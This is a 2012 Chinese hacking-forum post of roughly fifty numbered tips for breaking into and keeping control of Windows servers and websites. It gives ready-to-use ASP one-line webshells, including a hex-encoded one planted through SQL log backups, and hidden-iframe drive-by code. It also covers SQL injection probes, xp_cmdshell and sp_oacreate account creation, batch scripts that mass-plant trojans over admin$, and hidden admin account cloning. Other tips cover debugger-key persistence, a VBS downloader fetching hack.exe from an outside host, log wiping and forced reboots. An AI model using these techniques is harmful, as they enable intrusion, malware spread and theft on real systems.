找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2265|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* O5 W0 b7 n* D) T+ ?
cacls C:\windows\system32 /G hqw20:R
/ K( Y1 k: Y! J5 l# i1 {, [6 D思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入3 l5 w+ d4 Q$ g9 t
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F0 z, ]2 D1 v! `

0 Y# V2 v' R( Y: T5 @1 `4 S. o$ ]8 T1 q2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, e/ @+ {% I9 \

) m( f! m- n0 G- f. l% [3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
* m% E! Q1 F/ l, F
6 n2 O! z8 m$ ~# N# {/ q4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
" ~3 G/ M* t( `3 t8 l9 O
# Y- y8 c% c  g5、利用INF文件来修改注册表
" `) \5 P: s" h5 p8 E6 _[Version]5 N8 D2 k% V* P; N5 X
Signature="$CHICAGO$"
% G& w3 M. _3 x/ ]' k4 s5 D# L( D; I[Defaultinstall]
. C# @$ Z, ]- }# i* FaddREG=Ating
, R" z+ b7 i; x4 b# L! k' Z6 C[Ating]
" U# ~2 d6 Q" o0 d6 fHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
3 H9 H( P' R( W! _$ n: i- f以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:2 U4 i" [; Q. d2 q$ {# f
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 E4 P1 D$ L7 M& X其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
  _4 _. I9 A$ k% BHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
  k0 e% q& B5 M/ ^  i6 WHKEY_CURRENT_CONFIG 简写为 HKCC1 o0 A' i3 C+ @3 r  W/ D' M' {9 [' q+ T
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
& ]& O/ R  ^. F2 z9 z$ G"1"这里代表是写入或删除注册表键值中的具体数据6 ?; l: U7 h& T4 V- @  E- \/ N5 T
% I: m( F% P- s. l* U
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,6 i+ J4 O2 l: _. s# V, _
多了一步就是在防火墙里添加个端口,然后导出其键值. k& L- Y7 e2 n$ ^8 l
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
& a: ^+ ]( m3 t, [: |1 Z0 ?' y1 }  x8 k" y5 Q, i0 M) P
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽. L$ s7 k4 ]8 T3 R% ]
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" F" Y+ s2 e; `. o( U. K/ y* x
. R$ U* X* |6 M/ X  Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 t4 D- R9 n+ J  m+ y# o

% i' ]/ p8 Z* ~; ?% c9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
% z+ e% L2 I# k1 w* W) N可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
* w# u6 v9 C8 f1 M% m# r$ \
  p6 a7 k& U7 M) Q# b( R10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
) p) E, n# T$ W+ V$ d6 ]+ t9 U3 b6 Y3 `" b2 u$ \. E
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,/ G6 l# s, c# v6 B
用法:xsniff –pass –hide –log pass.txt
2 W) l) g6 e& n5 N, A: w- Q( _! ^% ^& V1 m. f* E* t+ H' Z
12、google搜索的艺术
. b. i- @) p& c4 B9 r; c搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 k: T1 n- o) Y: N( B5 a或“字符串的语法错误”可以找到很多sql注入漏洞。  L8 @. L0 H% Z9 k: R" R
4 l) _% @/ B( g) B$ l
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 H1 Q4 E4 \* B2 w! d) {9 a
4 J7 F: t0 r! K. S4 i1 F' l14、cmd中输入 nc –vv –l –p 1987
  h% J! p" @/ [/ l0 m- _; Z% m做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% H; Z7 ^6 L6 R; T' m$ A6 l. [8 ~. |
15、制作T++木马,先写个ating.hta文件,内容为: p6 q1 F+ Y" u! s) s
<script language="VBScript">9 v( P& K9 J4 @$ O* k, F
set wshshell=createobject ("wscript.shell" )
& I( u3 }7 g/ u1 }4 \, x2 xa=wshshell.run("你马的名称",1)
+ Z: e/ q$ Z& `6 Z3 wwindow.close
5 i; U- ?$ b( V5 [8 S</script>/ F7 a9 W* R" j8 q- a4 d* z
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 e2 u0 c8 p- k- j  k; r( f

: S& @! o& N3 M+ H; ^16、搜索栏里输入! s, C$ k# J% _* a) u/ T. m
关键字%'and 1=1 and '%'='
3 ]0 s7 t' U2 w4 b6 B! i关键字%'and 1=2 and '%'='
& E+ e& ]; F6 z+ a比较不同处 可以作为注入的特征字符
8 e( q1 Y: ^5 I) _# ~2 u. M5 K5 L
! O( o  {9 P$ |/ N' a  _17、挂马代码<html>" B& u1 F, A% O/ X
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>3 O% p- ~1 h. k
</html>
' G$ C! i! m1 e
! D# _  D6 A6 E0 y* d- Z4 X18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,% _' O+ g! t8 Y. }$ m! \4 \, q" h
net localgroup administrators还是可以看出Guest是管理员来。1 \! N2 ]+ u! u4 R

5 n$ f' Y& z4 G) T: U19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
  v4 F2 Y" S. d+ y+ [5 p6 `; t用法: 安装: instsrv.exe 服务名称 路径
9 y3 ]% \6 l% q  F& j/ W- k0 U卸载: instsrv.exe 服务名称 REMOVE6 ?4 Q7 o. c& V1 j- G

; E% {$ W2 h% {+ B4 e2 b4 V# s9 Z! {; h: \6 }/ w
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
4 m. i# L* L% x& w  C: \不能注入时要第一时间想到%5c暴库。
% Q4 \. \2 h4 ]& u% Q* c& u' c/ T2 ~- B( M: H& w- n
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. U! S9 V* ~0 E8 G

8 L7 \+ Q2 H2 ?& E, H23、缺少xp_cmdshell时
% q$ _% J; u7 w& A8 l" ]尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 S- u* V2 G( P4 Y$ m: k; }
假如恢复不成功,可以尝试直接加用户(针对开3389的)% ]& h. J. ^3 ?3 R
declare @o int) o# ?7 x) x- D4 y* ~3 D* @2 Y
exec sp_oacreate 'wscript.shell',@o out1 Z* y6 a* @% y" D+ z' b$ a
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
. X" D- x2 C8 P- b
0 F5 c$ U6 S' s7 `( ~24.批量种植木马.bat6 E5 ]. B% y8 i& k( @9 |
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中- D' }% y* \$ h6 c
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
: @8 k* _# C8 f" a2 D% i扫描地址.txt里每个主机名一行 用\\开头8 a. t3 b7 N9 y0 ]

; U( m) u. J2 J" s& H; e25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
' C1 n1 D6 E" \( K) M. R" l! x/ H: U% K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ D  ^+ N- n/ q  w6 w8 h将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.  E6 W5 J8 o& g; Y4 G! S
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马: B% T, n' h+ z1 k4 \2 f) F

, C: N( O: B, b$ @' ?) @% v27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
; m# G+ A" k- d) i7 {9 P2 r然后用#clear logg和#clear line vty *删除日志
3 u% L) {1 ~" \
( R% b0 `# B6 n28、电脑坏了省去重新安装系统的方法
" w3 k- p3 q2 _( S0 Y1 I. F; b纯dos下执行,
& w$ B9 {3 t  Sxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config5 P; d3 X3 Y1 r; @# f& F# I
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
0 Z9 Z' d0 S: @; j, w( P
3 a4 U( O& m. h% ~0 B29、解决TCP/IP筛选 在注册表里有三处,分别是:/ i8 p1 N. f  h! W3 e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip( i$ Z, s8 y7 c* Z) h- I7 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 t6 H/ {% Q3 w, UHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) p9 B. x$ m) h# S3 }6 X% H
分别用6 n  }' U! ]* a; E* `' f% @' E
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. K1 S* i3 ^, G' k6 tregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& g& m/ L9 ^1 e7 K4 bregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip  Q) W& z6 f' H: d; z" \; J
命令来导出注册表项: F, @7 n% ^, f, M! ~8 e
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
' b/ c3 F. F# j9 {改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
# \8 \: s* p2 ~2 @) b; ]regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 B, s* o/ p& N9 v2 @* ~( h0 X7 n& E- E1 u5 O. W* K# ^& X6 P
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U0 b1 W3 _, T8 x7 j5 T$ ?9 t, V
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3" X% `2 V' U5 O# O5 b' u0 i* T$ w! K
* N( m& I. \: p5 g8 B4 g+ \5 u
31、全手工打造开3389工具  O( J$ k) d/ z+ j4 _9 Z& F0 k" f
打开记事本,编辑内容如下:: N& H* `- w8 `) F6 R
echo [Components] > c:\sql( a* G* i( X3 D2 B) t
echo TSEnable = on >> c:\sql/ y/ z1 J* p5 o4 A, R7 q7 c
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q7 S5 H: F6 J* e& x4 L3 k& L
编辑好后存为BAT文件,上传至肉鸡,执行+ Y- J( J* M) m7 j- l/ R

3 h0 _1 L* X( ]3 C) I  Y$ e32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' \2 b. {  @7 W6 R
2 F; E1 A1 L" p% F5 [
33、让服务器重启
9 r% N) V3 r1 J3 ?1 x/ D$ ^  D写个bat死循环:
6 U/ G& |, j% ]1 ^@echo off
' [/ U, L1 t, z: p0 h/ H; h:loop1
) _3 b. r6 F1 m3 I+ g3 zcls
5 B+ ?) {8 T. ystart cmd.exe" w: ^7 z, ~) a) k2 T
goto loop1" o- V3 Q8 M0 ~1 B+ ]5 I. v+ A
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启, n9 R0 m1 f# k) r3 W7 }+ Y

4 O4 T& P9 x5 M! b" H$ Q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' K6 a* O8 R7 R@echo off, r; M/ S4 m9 Z$ {4 `: l8 M1 G( R5 K
date /t >c:/3389.txt1 o. p$ \. J8 N) z+ m5 P2 {$ E
time /t >>c:/3389.txt
* `, c3 A, v: g) J  Q+ F! y: vattrib +s +h c:/3389.bat1 b6 l6 M+ ?7 E4 X  a# o
attrib +s +h c:/3389.txt
" f7 y  |+ y6 y, znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt4 [/ [# ]" E, O5 ~3 {+ N3 B
并保存为3389.bat
8 N6 T; F% i. Q打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 P1 ~- d6 X7 ]
  x# Z6 H7 W9 E8 _+ J  C$ E35、有时候提不了权限的话,试试这个命令,在命令行里输入:7 X0 T3 Q* w- H0 _: Q) P# P; Y
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)! b5 ?6 y, n( `' g& W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。" i4 l+ k3 o0 c* `2 q7 P0 E
; t8 r6 _1 R: S
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件+ Q- G: [  K8 C# m- m
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址- X# R9 r% U$ _; G& `
echo 你的FTP账号 >>c:\1.bat //输入账号
2 m, E# ]* w$ E: r' vecho 你的FTP密码 >>c:\1.bat //输入密码
& W$ _+ o$ \! t9 v+ T: {echo bin >>c:\1.bat //登入+ c. @) \; J3 {4 d% f# h- z
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么$ ?( p$ v, g$ ^' W9 |& ?8 [/ m
echo bye >>c:\1.bat //退出
. y) G9 a+ U1 e* n  e然后执行ftp -s:c:\1.bat即可
: v( B% H! w3 @: D
. q( r8 v1 n$ W- j37、修改注册表开3389两法
0 t6 B& g; a0 T(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- L9 X/ k) l: u
echo Windows Registry Editor Version 5.00 >>3389.reg
0 |9 r0 ]4 }& B5 _/ O/ d* vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg' p* ?2 L5 A3 m' W$ F7 i" i
echo "Enabled"="0" >>3389.reg
* E0 ]: ^' y4 k# Q/ ]  |+ C0 h( G) Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# j2 n" \% |* C# c1 ?2 Z$ WNT\CurrentVersion\Winlogon] >>3389.reg, \0 e! H4 j. `$ p1 q
echo "ShutdownWithoutLogon"="0" >>3389.reg/ v5 p8 X, {% a& k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
6 \6 }  W, q9 G# U5 m>>3389.reg
! C; C9 X' i3 e2 t' {) Cecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
5 `) b  l/ H1 xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 J# d6 I3 t8 W: e9 D) F
>>3389.reg
8 S* r9 L% Z7 j1 |- x: |! k4 `$ j6 l8 Qecho "TSEnabled"=dword:00000001 >>3389.reg
" ^3 Z1 M7 I5 N6 o$ ?6 K4 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg9 k/ Y  p& X: P) I' e& `
echo "Start"=dword:00000002 >>3389.reg( l. N. F1 }8 o9 G, Q4 ^3 y  o- r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
- L* \$ r) o& l' I8 X>>3389.reg( M; @, X& R4 O5 e6 s+ I
echo "Start"=dword:00000002 >>3389.reg/ V7 h1 n3 `# g
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg3 b0 u* y' F$ o3 o9 W1 N! Y& b" Q  `4 R
echo "Hotkey"="1" >>3389.reg
, p: \3 P5 e: v; [- ^8 I' Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 J7 X4 W) p$ y9 V9 q  E: a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg3 Q- o9 |- \+ n5 N* G
echo "PortNumber"=dword:00000D3D >>3389.reg
3 W% N- r8 W  r6 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 r- P! _( U' p2 V/ yServer\WinStations\RDP-Tcp] >>3389.reg0 t( P. ~/ d6 i2 ~
echo "PortNumber"=dword:00000D3D >>3389.reg
  g  z/ G9 [3 j0 p7 V* [8 [7 T9 S把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' Z- S' Y% [# Y! k# B8 s1 q(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* Z+ {1 {1 m, G7 p1 s
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效! h9 I% a  h& w! l, r, X
(2)winxp和win2003终端开启
/ P% S# Y8 Y/ k6 ?" ?用以下ECHO代码写一个REG文件:* c' \5 w# ]; Z) W% m5 z
echo Windows Registry Editor Version 5.00>>3389.reg
, o8 }3 h7 I: }% R9 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ ?" o* P8 b$ W8 i; c6 }8 }
Server]>>3389.reg
! h* Y  i3 H: b; p( v1 o, Iecho "fDenyTSConnections"=dword:00000000>>3389.reg! I0 l4 f5 h: @1 u9 c' n1 D  b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! e# l5 h5 V1 U2 G3 [: @9 P1 `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
) n" }/ Y  H7 O) eecho "PortNumber"=dword:00000d3d>>3389.reg
/ }% b( y9 e  e- Z& c0 v! z- secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# S4 u* d# v5 g& f
Server\WinStations\RDP-Tcp]>>3389.reg
+ L: q- T9 e( d# Recho "PortNumber"=dword:00000d3d>>3389.reg
. |! M. j1 ]1 H" p" D# X然后regedit /s 3389.reg del 3389.reg! B7 T- P1 ^. W, m
XP下不论开终端还是改终端端口都不需重启8 ?4 T0 S  T9 J/ }

# c2 c$ A  F+ m  t- [/ B38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃$ D. |1 ~/ h- v- m! M2 O* }6 `
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& C; U- K& M8 M( c! i: q& V* H) a7 Z' e; x6 j& I
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
, p; P$ v  u  E- ^& x  g(1)数据库文件名应复杂并要有特殊字符
1 P; e; Y0 K& N8 b% p9 N(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: q- s& L6 j2 |  |' D将conn.asp文档中的4 f# m) O5 t( y9 R" b" J* f
DBPath = Server.MapPath("数据库.mdb")
* }: A4 l' l6 E, A# B) Z* _conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
& D8 p" U1 y: r. r8 }" M& Z1 {: G5 D. G7 @5 t2 j
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
+ b$ P5 f6 A; ^2 R- p, }, D(3)不放在WEB目录里
; y/ U, {; z) b0 Q
4 k* l1 i! L8 q# l. K6 K40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉; o- m' k7 x9 O3 M1 Z; e+ _; o7 C
可以写两个bat文件" `0 J7 t3 i2 ^& u
@echo off; l# D0 u; x! i  y1 I1 @7 j
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe6 U1 P7 \" F$ t6 E% p! H  @
@del c:\winnt\system32\query.exe/ a4 m7 x; y5 y( o  l
@del %SYSTEMROOT%\system32\dllcache\query.exe
$ E5 s: l  t8 R. U. f$ |@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的1 Q& W& _* p/ F* A' f2 [" i, A
' V. l+ g$ W8 ^. Q2 Q
@echo off
( d; U! e. O* A! Z1 t# y@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
( ?  W, k- |" Y5 \@del c:\winnt\system32\tsadmin.exe2 @. `3 m( @5 G3 R" J: b+ u! i
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex: p& V% \. c/ e4 b6 v( P+ g
! d  [' e8 ~8 {% g2 k/ f
41、映射对方盘符, R/ S3 b& @* g
telnet到他的机器上,# ^! N8 i" C# p* \$ J- P" W
net share 查看有没有默认共享 如果没有,那么就接着运行- s- G8 Z- n* y0 c
net share c$=c:7 ~' y6 B/ C- f! O# S& V
net share现在有c$
* s7 F, W. Z- l在自己的机器上运行& ]. U+ {" T- C7 Z2 D: \5 L
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K& J5 A' p1 w2 d- l+ V

* R7 D6 J0 Z- ~- V! y- ?42、一些很有用的老知识
2 D! y. ?( I4 I3 `" M! w( n$ _8 Itype c:\boot.ini ( 查看系统版本 ), T; L3 ]$ w' `9 o/ g
net start (查看已经启动的服务)) M. \/ b7 q: z4 L9 U( f5 {
query user ( 查看当前终端连接 ); Y+ m2 Z, W; y6 f! i
net user ( 查看当前用户 )
4 x, o! D/ W/ \) R: D- O. ynet user 用户 密码/add ( 建立账号 )
1 z  _+ \2 U# ^; G/ G6 anet localgroup administrators 用户 /add (提升某用户为管理员)
+ }  v2 H0 z/ \9 D$ N1 qipconfig -all ( 查看IP什么的 )
8 L; x/ }3 y* O  H' H  Q' ]netstat -an ( 查看当前网络状态 )
/ Y7 \' }/ P1 r  s5 i: E) _" cfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
' C: `% ], g* O克隆时Administrator对应1F4% p+ W0 a- u: {
guest对应1F5
. B6 |! e6 w' \tsinternetuser对应3E8
1 Q6 W( [; ~8 y. m$ s' c% t' |+ k7 D; ~* I1 D% N$ K, v/ j6 s' w
43、如果对方没开3389,但是装了Remote Administrator Service/ Y( }! H9 _5 x& K0 P- [2 m) T
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接& A4 Z- Z7 P: ?) N
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
$ y2 X' ^& e1 Q0 h$ i/ ?先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
% J$ F$ Q+ i- O8 b4 c) ^( n$ {3 j# r
& _7 ~6 X3 D( T3 W. T+ i44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: ]1 N! T5 ^" G" g' i0 o" P1 C本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
( u$ J2 w( ~( P0 s9 G, [
# o* f, [; B9 ~& o45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入). @* a5 E* }+ m. a
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open+ G* t* _3 X9 J' C
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =3 H% g5 I& G- e' ?9 _8 n6 S
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =# x' G$ P/ P9 N; ?, p6 Y, ]
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs  v* ], n! C) K6 P7 P+ o; Q! y
(这是完整的一句话,其中没有换行符)
- O! d0 t4 ^3 v3 Y2 w' Q然后下载:. x4 a" F& P' z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
1 F, |1 E9 Q% d* [9 G. M' f: L- S- ^
46、一句话木马成功依赖于两个条件:" P9 C: ~; L% y
1、服务端没有禁止adodb.Stream或FSO组件: B) `# Y, |" \+ O4 D6 D  W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。! V* B& `: w7 F+ S: |7 G* n2 y

4 A( l5 ]. ?' u% s+ U; h) \47、利用DB_OWNER权限进行手工备份一句话木马的代码:
- J9 U# G' f# a7 U7 ~$ Z;alter database utsz set RECOVERY FULL--
- b# |# a. m" T) \$ _, e* r;create table cmd (a image)--: I3 f0 Z+ K9 X+ h
;backup log utsz to disk = 'D:\cmd' with init--. y3 k/ l6 p5 N+ U) B/ \
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
- Z- S* H# I& u( p+ t8 G;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--* x( V: K- }! F4 D0 G% j% ~: d
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 b# T8 L) Z3 U5 p) m3 E8 T! Y, z( Q9 o9 }3 ]) P- F
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:& m3 {! \: B% k0 D

8 w' w( n2 x6 v8 U( _用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
! R* E* F( j0 T; X/ f4 y所有会话用 'all'。
- h7 h! ^+ m0 k-s sessionid 列出会话的信息。" g1 T0 L& f+ k* j$ [% \+ [4 `
-k sessionid 终止会话。& E4 z9 G0 [& O# L) p
-m sessionid 发送消息到会话。8 _2 _7 I/ V3 P2 z
- d2 ^% b4 E- G- {+ `% C; d5 h  K8 _
config 配置 telnet 服务器参数。
* i" B6 {; `* Y2 b4 @0 D' S
" ^8 g  I) f9 Z# Wcommon_options 为:) {3 B, R4 Q3 I- `
-u user 指定要使用其凭据的用户3 {/ J  P, Z5 o; k9 p$ k
-p password 用户密码
& m5 U; H+ Q, Q. J% M; O- C* t. B! S+ w, O; J
config_options 为:" y( z: W3 X. k
dom = domain 设定用户的默认域8 L& h# ?$ g+ |' T' g
ctrlakeymap = yes|no 设定 ALT 键的映射
) Y9 U( Q1 B5 k2 y9 g7 z- J/ Ftimeout = hh:mm:ss 设定空闲会话超时值% }, Z' {! R9 b" r
timeoutactive = yes|no 启用空闲会话。
2 y! R9 p/ t" l3 M+ _maxfail = attempts 设定断开前失败的登录企图数。
7 A4 t" f/ c, H9 ?0 \7 A4 X9 H& _maxconn = connections 设定最大连接数。7 u' g5 h; n% ?# H  x, R
port = number 设定 telnet 端口。
; g4 c7 G0 h$ asec = [+/-]NTLM [+/-]passwd5 Z& n' w( T0 J$ C
设定身份验证机构
# a; ?, o0 {' yfname = file 指定审计文件名。
2 z3 ]# T9 p, d* O. Vfsize = size 指定审计文件的最大尺寸(MB)。
5 O$ ?$ G. G* \$ E  X& x8 \mode = console|stream 指定操作模式。1 o7 K, s+ ^. J" ?% M4 d# N
auditlocation = eventlog|file|both
3 K& O. w1 s( i9 P指定记录地点! J$ V% n1 L# g( f( H; R
audit = [+/-]user [+/-]fail [+/-]admin8 i4 B% P1 K8 i  _& G
2 M4 g4 R: a9 y1 P
49、例如:在IE上访问:
0 {# J' z7 N$ R9 xwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
! T6 q7 ]; c) w; x( L5 \1 @, A7 zhack.txt里面的代码是:2 B3 s( r2 x, f% H  R# t
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
' ~' G9 U5 g( }: @+ u  G把这个hack.txt发到你空间就可以了!" W4 D7 z( p* N3 ?; y) Z
这个可以利用来做网马哦!  }" W1 T5 v: K* ]

* S1 v+ z( t# ?+ Z50、autorun的病毒可以通过手动限制!
% E$ @/ I% e6 {1 m, I2 u1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
, a! S/ a; E+ o2,打开盘符用右键打开!切忌双击盘符~
% x% D  ~# p- Y8 |; e% j! ~3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!: @9 J' U% _5 M: l. X
9 a4 G/ Z! T: O
51、log备份时的一句话木马:5 a& {9 K) N9 f, n! p
a).<%%25Execute(request("go"))%%25>
) I5 Y* j2 G* y7 zb).<%Execute(request("go"))%>3 d0 _; A* E  d$ g( k3 e; P. Y1 ?" E
